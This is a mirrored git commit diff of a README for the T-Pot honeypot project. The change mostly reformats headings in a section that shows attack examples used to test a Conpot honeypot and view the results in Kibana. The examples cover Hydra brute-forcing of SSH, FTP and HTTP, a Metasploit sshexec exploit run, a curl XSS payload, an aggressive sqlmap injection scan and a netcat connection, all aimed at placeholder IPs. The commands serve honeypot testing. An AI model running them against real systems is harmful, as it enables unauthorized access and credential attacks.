mirror of
https://github.com/telekom-security/tpotce.git
synced 2025-07-03 05:22:11 +00:00
Update README.md
This commit is contained in:
parent
95036e32dc
commit
0ea6df7b8b
1 changed files with 7 additions and 8 deletions
15
README.md
15
README.md
|
@ -324,7 +324,7 @@ nmap -sV <indirizzo-IP> # Service version detection
|
|||
<br>
|
||||
<br>
|
||||
|
||||
**Testing (ModBusSploit) 🛠️**
|
||||
#### **Testing (ModBusSploit) 🛠️**
|
||||
|
||||
In this section, we will perform tests on the **[ModBusSploit](https://github.com/C4l1b4n/ModBusSploit/)** tool to simulate attacks on the Conpot honeypot.
|
||||
|
||||
|
@ -355,19 +355,18 @@ python3 start.py
|
|||
3. **Result on Kibana dashboard:**
|
||||
<img width="1188" alt="kibana_dash" src="https://github.com/user-attachments/assets/de9c841b-830d-42d9-b778-61c270cc9c8c" />
|
||||
|
||||
<br>
|
||||
<br>
|
||||
<br>
|
||||
|
||||
**Brute force attack examples using Hydra:**
|
||||
### **Brute force attack examples using Hydra:**
|
||||
```sh
|
||||
hydra -l <utente> -P <file_wordlist> ssh://<indirizzo-IP>
|
||||
hydra -l <utente> -P <file_wordlist> ftp://<indirizzo-IP>
|
||||
hydra -l <utente> -P <file_wordlist> http-get://<indirizzo-IP>
|
||||
```
|
||||
|
||||
|
||||
|
||||
**Exploitation example using Metasploit:**
|
||||
### **Exploitation example using Metasploit:**
|
||||
```sh
|
||||
msfconsole
|
||||
use exploit/linux/ssh/sshexec
|
||||
|
@ -377,17 +376,17 @@ set PASSWORD <password>
|
|||
exploit
|
||||
```
|
||||
|
||||
**Example of an XSS attack using curl:**
|
||||
### **Example of an XSS attack using curl:**
|
||||
```sh
|
||||
curl -X POST -d "username=<script>alert('XSS')</script>" http://<indirizzo-IP>/login
|
||||
```
|
||||
|
||||
**SQL injection example using sqlmap:**
|
||||
### **SQL injection example using sqlmap:**
|
||||
```sh
|
||||
sqlmap -u "http://<indirizzo-IP>/page?id=1" --risk=3 --level=5
|
||||
```
|
||||
|
||||
**Netcat example to connect to port 80 (HTTP):**
|
||||
### **Netcat example to connect to port 80 (HTTP):**
|
||||
```sh
|
||||
nc -v <indirizzo-IP> 80
|
||||
```
|
||||
|
|
Loading…
Reference in a new issue